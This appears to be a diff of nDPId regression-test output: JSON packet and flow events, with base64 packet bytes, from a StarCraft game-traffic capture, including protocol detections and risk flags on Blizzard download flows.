-00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":270,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1437389968521,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1437389968521,"pkt":"IImEa8W6hCYVPnXECABFAAAoCWgAADUGmrmtwnHgwKgBZAG7DZzPzdbBMZJpS1ARAXR77AAAAAAAAAAA"} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":271,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1437389968521,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968521,"pkt":"hCYVPnXEIImEa8W6CABFAAAobDdAAIAGrOnAqAFkrcJx4A2cAbsxkmlLz83WwlAQAP18YwAA"} -00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":272,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1437389968521,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"thread_ts_msec":1437389968521,"pkt":"IImEa8W6hCYVPnXECABFAABdqvpAADkGo0gC5C5owKgBZAG7DaNR8ZdDlhSqVFAYAi3xwAAAFQMCADAv7rGxhq2HqkFRX8I5oUWALbAWkrPmznIlHUyodNC0DL7UHLBQOucKALsB4ikroko="} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":273,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1437389968521,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968521,"pkt":"hCYVPnXEIImEa8W6CABFAAAoaExAAIAGnyvAqAFkAuQuaA2jAbuWFKpUUfGXeFAUAACDRwAA"} -00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":275,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1437389968525,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"thread_ts_msec":1437389968525,"pkt":"IImEa8W6hCYVPnXECABFAABd8QVAADkGXTMC5C5ywKgBZAG7DZjX42FMOcd1YVAYArORfwAAFQMCADAnMl10t6P0LqwYwp17IIJpYKwGMbTqEggZBxrTB\/KdrEJjLBHayLFZyNZHXp1TB8c="} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":276,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1437389968525,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968525,"pkt":"hCYVPnXEIImEa8W6CABFAAAoGW1AAIAG7gDAqAFkAuQucg2YAbs5x3Vh1+NhgVAUAADEjQAA"} -00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":278,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1437389968541,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"thread_ts_msec":1437389968541,"pkt":"IImEa8W6hCYVPnXECABFAABdD8xAADkGPncC5C5owKgBZAG7DaEXdnI2KPa\/clAYAi2WsQAAFQMCADDEyuty98HROVf0C9dCpYEUA7Jug9PX6pMmtPtLY+MIAZP0XBy+LRgi1JBN1q929Nc="} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":279,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1437389968541,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968541,"pkt":"hCYVPnXEIImEa8W6CABFAAAoaE5AAIAGnynAqAFkAuQuaA2hAbso9r9yF3Zya1AUAAA60gAA"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":281,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1437389968610,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1437389968610,"pkt":"IImEa8W6hCYVPnXECABFAAAoIUtAAPIGObXHJqScwKgBZAG7DZ7bDuslZeBiaVAQFLnPdAAAAAAAAAAA"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":282,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1437389968610,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1437389968610,"pkt":"IImEa8W6hCYVPnXECABFAAAoIUxAAPIGObTHJqScwKgBZAG7DZ7bDuslZeBiaVARFLnPcwAAAAAAAAAA"} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389964790,"flow_last_seen":1437389964790,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389964790,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"87.248.221.254","src_port":3508,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1437389964790,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389964790,"pkt":"hCYVPnXEIImEa8W6CABFAAA0FwlAAIAG67fAqAFkV\/jd\/g20AFApaAewAAAAAIAC\/\/838QAAAgQFtAEDAwgBAQQC"} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1437389964848,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389964848,"pkt":"IImEa8W6hCYVPnXECABFAAA0tGpAAPUG2VVX+N3+wKgBZABQDbTA0NjuKWgHsYAS\/\/+fJQAAAgQFtAEDAwQEAgAA"} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1437389964848,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389964848,"pkt":"hCYVPnXEIImEa8W6CABFAAAoFwpAAIAG68LAqAFkV\/jd\/g20AFApaAexwNDY71AQBADa8wAA"} +00998{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389964790,"flow_last_seen":1437389964848,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1437389964848,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"87.248.221.254","src_port":3508,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"llnw.blizzard.com","url":"llnw.blizzard.com\/sc2-pod-retail\/AF11CD00\/EU\/24621.direct\/s2-36281-BA356DD57557728843CAF63A12C79AA3.mfil","code":0,"content_type":"","user_agent":"Blizzard Web Client"}} +01158{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":62,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1437389964790,"flow_last_seen":1437389964921,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1647,"flow_avg_l4_payload_len":274,"midstream":0,"thread_ts_msec":1437389964921,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"87.248.221.254","src_port":3508,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"},"http": {"hostname":"llnw.blizzard.com","url":"llnw.blizzard.com\/sc2-pod-retail\/AF11CD00\/EU\/24621.direct\/s2-36281-BA356DD57557728843CAF63A12C79AA3.mfil","code":200,"content_type":"application\/octet-stream","user_agent":"Blizzard Web Client"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":234,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389967432,"flow_last_seen":1437389967432,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389967432,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"12.129.222.54","src_port":3512,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":234,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1437389967432,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389967432,"pkt":"hCYVPnXEIImEa8W6CABFAAA0U2dAAIAG+pjAqAFkDIHeNg24AFDXJA2NAAAAAIACIACvkgAAAgQFtAEDAwgBAQQC"} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":235,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1437389967630,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389967630,"pkt":"IImEa8W6hCYVPnXECABFAAA0AABAAC0GoQAMgd42wKgBZABQDbj6JMXG1yQNjoASFtD4xgAAAgQFtAEBBAIBAwMH"} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":236,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1437389967630,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389967630,"pkt":"hCYVPnXEIImEa8W6CABFAAAoU2hAAIAG+qPAqAFkDIHeNg24AFDXJA2O+iTFx1AQAQBPaQAA"} +00806{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":237,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389967432,"flow_last_seen":1437389967639,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":1437389967639,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"12.129.222.54","src_port":3512,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.WorldOfWarcraft","breed":"Fun","category":"Game"},"http": {"hostname":"us.scan.worldofwarcraft.com","url":"us.scan.worldofwarcraft.com\/update\/Launcher.txt","code":0,"content_type":"","user_agent":""}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":245,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389968486,"flow_last_seen":1437389968486,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389968486,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3492,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":245,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1437389968486,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968486,"pkt":"hCYVPnXEIImEa8W6CABFAAAoaD9AAIAGnzjAqAFkAuQuaA2kAbvjTIWjXKb5cVARAQDtEwAA"} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":246,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389968487,"flow_last_seen":1437389968487,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389968487,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3489,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":246,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1437389968487,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968487,"pkt":"hCYVPnXEIImEa8W6CABFAAAoaEBAAIAGnzfAqAFkAuQuaA2hAbso9r9xF3ZyNlARAP06DgAA"} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":247,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389968487,"flow_last_seen":1437389968487,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389968487,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3490,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":247,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1437389968487,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968487,"pkt":"hCYVPnXEIImEa8W6CABFAAAoaEFAAIAGnzbAqAFkAuQuaA2iAbuuMy\/9hNS6Y1ARAQCOtQAA"} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":248,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389968487,"flow_last_seen":1437389968487,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389968487,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3491,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":248,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1437389968487,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968487,"pkt":"hCYVPnXEIImEa8W6CABFAAAoaEJAAIAGnzXAqAFkAuQuaA2jAbuWFKpTUfGXQ1ARBFh\/KAAA"} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":249,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389968487,"flow_last_seen":1437389968487,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389968487,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3482,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":249,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1437389968487,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968487,"pkt":"hCYVPnXEIImEa8W6CABFAAAoGWNAAIAG7grAqAFkAuQucg2aAbv4rJBdJdjUo1ARAP0omQAA"} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":250,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389968487,"flow_last_seen":1437389968487,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389968487,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3480,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":250,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1437389968487,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968487,"pkt":"hCYVPnXEIImEa8W6CABFAAAoGWRAAIAG7gnAqAFkAuQucg2YAbs5x3Vg1+NhTFARAQDDxgAA"} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":251,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389968487,"flow_last_seen":1437389968487,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389968487,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3481,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":251,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1437389968487,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968487,"pkt":"hCYVPnXEIImEa8W6CABFAAAoGWVAAIAG7gjAqAFkAuQucg2ZAbvryQjoVlrkVFARAQB8vAAA"} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":252,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389968487,"flow_last_seen":1437389968487,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389968487,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3479,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":252,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1437389968487,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968487,"pkt":"hCYVPnXEIImEa8W6CABFAAAoGWZAAIAG7gfAqAFkAuQucg2XAbvNUW978CZu3VARBF0M8QAA"} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":253,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389968487,"flow_last_seen":1437389968487,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389968487,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"199.38.164.156","src_port":3486,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":253,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1437389968487,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968487,"pkt":"hCYVPnXEIImEa8W6CABFAAAoPo5AAIAGjnLAqAFkxyaknA2eAbtl4GJo2w7rJVAR9fPuOQAA"} +00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":254,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389968488,"flow_last_seen":1437389968488,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389968488,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"173.194.113.224","src_port":3484,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":254,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1437389968488,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968488,"pkt":"hCYVPnXEIImEa8W6CABFAAAobDZAAIAGrOrAqAFkrcJx4A2cAbsxkmlKz83WwVARAP18ZAAA"} +00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":255,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1437389968519,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"thread_ts_msec":1437389968519,"pkt":"IImEa8W6hCYVPnXECABFAABdOZFAADkGFKgC5C5ywKgBZAG7DZol2NSj+KyQXlAYAk8nagAAFQMCADAMud3SaYTsSqa\/uoo0a5E8VCc4Xkt3IWOikvjNzbZ6\/KN17SBOZ1wiAn+Wb8fZvA4="} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1437389968519,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968519,"pkt":"hCYVPnXEIImEa8W6CABFAAAoGWdAAIAG7gbAqAFkAuQucg2aAbv4rJBeJdjU2FAUAAApXQAA"} +00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":258,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1437389968519,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"thread_ts_msec":1437389968519,"pkt":"IImEa8W6hCYVPnXECABFAABdHrRAADkGL4UC5C5ywKgBZAG7DZfwJm7dzVFvfFAYAvbMYQAAFQMCADAisnLQsHrL1EoW2shNoX67xhkXstAI1yd6wVWuICpme1diCl2In\/GtYthhkjE1BS4="} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":259,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1437389968519,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968519,"pkt":"hCYVPnXEIImEa8W6CABFAAAoGWhAAIAG7gXAqAFkAuQucg2XAbvNUW988CZvElAUAAARFQAA"} +00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":261,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1437389968519,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"thread_ts_msec":1437389968519,"pkt":"IImEa8W6hCYVPnXECABFAABdZwtAADkG5y0C5C5ywKgBZAG7DZlWWuRU68kI6VAYAk+37QAAFQMCADBkKOWBHzDl37wozuIxUqGksDGbpGilDaRqgrJ95jL33eBT4nQmWu5qzsKHkzuYbBI="} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":262,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1437389968520,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968520,"pkt":"hCYVPnXEIImEa8W6CABFAAAoGWlAAIAG7gTAqAFkAuQucg2ZAbvryQjpVlrkiVAUAAB9gwAA"} 